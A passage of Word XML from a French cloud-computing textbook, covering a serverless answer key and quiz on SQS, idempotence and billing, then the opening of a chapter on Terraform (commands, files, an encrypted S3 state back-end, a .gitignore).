        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le coût dépend du produit mémoire × durée : augmenter la mémoire peut réduire la durée plus que proportionnellement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La mesure doit se faire sur un échantillon représentatif, pas sur une requête unique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 73.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Dépôt S3 → événement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ObjectCreated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>2. Écriture d'un message dans SQS (stockage durable)</w:t>
        <w:br/>
        <w:t>3. Fonction déclenchée par SQS, lot de 5</w:t>
        <w:br/>
        <w:t xml:space="preserve">4. Traitement par message, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ReportBatchItemFailures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>5. En cas d'échec après 3 réessais → file de lettres mortes</w:t>
        <w:br/>
        <w:t>6. Rejeu manuel après correction, avec la même clé d'idempotence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>S3 vers Lambda directement fonctionne, mais SQS ajoute un stockage durable et un mécanisme de réessai contrôlé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le rejeu manuel doit être documenté : il fait partie du fonctionnement normal, pas d'une urgence.</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Sur quoi repose la facturation serverless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Le nombre de serveurs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Les invocations et la durée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 stockage seul</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La bande passante</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Pourquoi une fonction doit-elle être idempotente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Pour la sécurité</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Parce qu'elle peut être rejouée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Pour la vitesse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Pour réduire la mémoire</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Où placer les initialisations coûteuses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Dans le gestionnaire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Hors du gestionnaire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Dans une variable locale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Dans le paquet</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À quoi sert une file de lettres mortes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Accélérer les fonctions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Conserver les événements non traités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Compresser les messages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Chiffrer les données</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Quand le serverless coûte-t-il plus cher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Charge irrégulière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Charge constante et élevée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Petits volumes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Trafic nocturne</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La mémoire allouée multiplie la durée facturée.</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Les réessais automatiques peuvent exécuter deux fois le même événement.</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Elles sont réutilisées si l'instance est réutilisée.</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Elle permet d'analyser et de rejouer les échecs définitifs.</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Une instance permanente devient plus économique à charge continue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>74. Terraform : décrire l'infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Rendre l'infrastructure lisible, versionnée et reproductible grâce à un état géré.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 30 · Niveau : Intermédiaire · Prérequis : chapitre 73</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Écrire et organiser des fichiers Terraform.</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Comprendre le rôle de l'état et du verrou.</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Utiliser variables, sorties et modules.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Lire un plan avant d'appliquer.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Éviter les pièges de destruction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>74.1 Le cycle en trois temps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Terraform compare la configuration écrite, l'état enregistré et la réalité du fournisseur. Il en déduit un plan, puis l'applique. Cette comparaison est ce qui rend l'outil prévisible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="87" name="Picture 87"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f85.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId123"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.85 — Le cycle Terraform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Sept commandes de base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terraform init</w:t>
        <w:br/>
        <w:t>terraform validate</w:t>
        <w:br/>
        <w:t>terraform fmt -recursive</w:t>
        <w:br/>
        <w:t>terraform plan -out=tfplan</w:t>
        <w:br/>
        <w:t>terraform apply tfplan</w:t>
        <w:br/>
        <w:t>terraform state list</w:t>
        <w:br/>
        <w:t>terraform output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.276 — Cinq fichiers typiques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82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Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2825"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>main.tf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ressources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Point d'entrée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="282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variables.tf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Entrées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Types et valeurs par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2825"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>outputs.tf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sorties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Utilisées par d'autres modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="282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versions.tf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Contraintes de versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Fichier verrou généré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2825"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>terraform.tfvars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Valeurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Souvent non versionné</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>74.2 L'état</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'état associe chaque ressource écrite à un identifiant réel chez le fournisseur. Il contient parfois des valeurs sensibles et doit être stocké dans un back-end partagé et verrouillé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un back-end partagé · hcl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Back-end distant avec verrouillage</w:t>
        <w:br/>
        <w:t>terraform {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  required_version = "&gt;= 1.8"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  backend "s3" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    bucket         = "mon-terraform-state"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    key            = "production/network/terraform.tfstate"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    region         = "eu-west-3"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    dynamodb_table = "terraform-locks"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    encrypt        = true</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.277 — Cinq back-ends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96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Back-end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Verrou</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="376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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Local</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucun</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3767"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Apprentissage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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S3 + DynamoDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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376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AWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Azure Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>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3767"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Azure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Google Cloud Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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376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GCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Terraform Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>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3767"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Équipe multi-cloud</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NE VERSIONNEZ JAMAIS L'ÉTAT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>L'état contient des identifiants et parfois des secrets en clair. Il se stocke dans un compartiment chiffré, avec accès restreint et versionnement activé. Le fichier local ne doit jamais entrer dans le dépôt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un `.gitignore` indispensable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.gitignore</w:t>
        <w:br/>
        <w:t>.terraform/</w:t>
        <w:br/>
        <w:t>*.tfstate</w:t>
        <w:br/>
        <w:t>*.tfstate.backup</w:t>
        <w:br/>
        <w:t>*.tfplan</w:t>
        <w:br/>
        <w:t>terraform.tfvars</w:t>
        <w:br/>
        <w:t>crash.log</w:t>
        <w:br/>
        <w:br/>
        <w:t># Récupérer un état perdu</w:t>
        <w:br/>
        <w:t># 1. Restaurer la version précédente du back-end</w:t>
        <w:br/>
        <w:t># 2. Vérifier avec `terraform plan` qu'aucune ressource n'est recréée</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>74.3 Variables, sorties et modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une configuration lisible nomme ses entrées, décrit ses sorties et isole les ressources réutilisables dans des modules. C'est ce qui distingue un script d'une infrastructure maintenable.</w:t>
      </w:r>
    </w:p>
    <w:p>
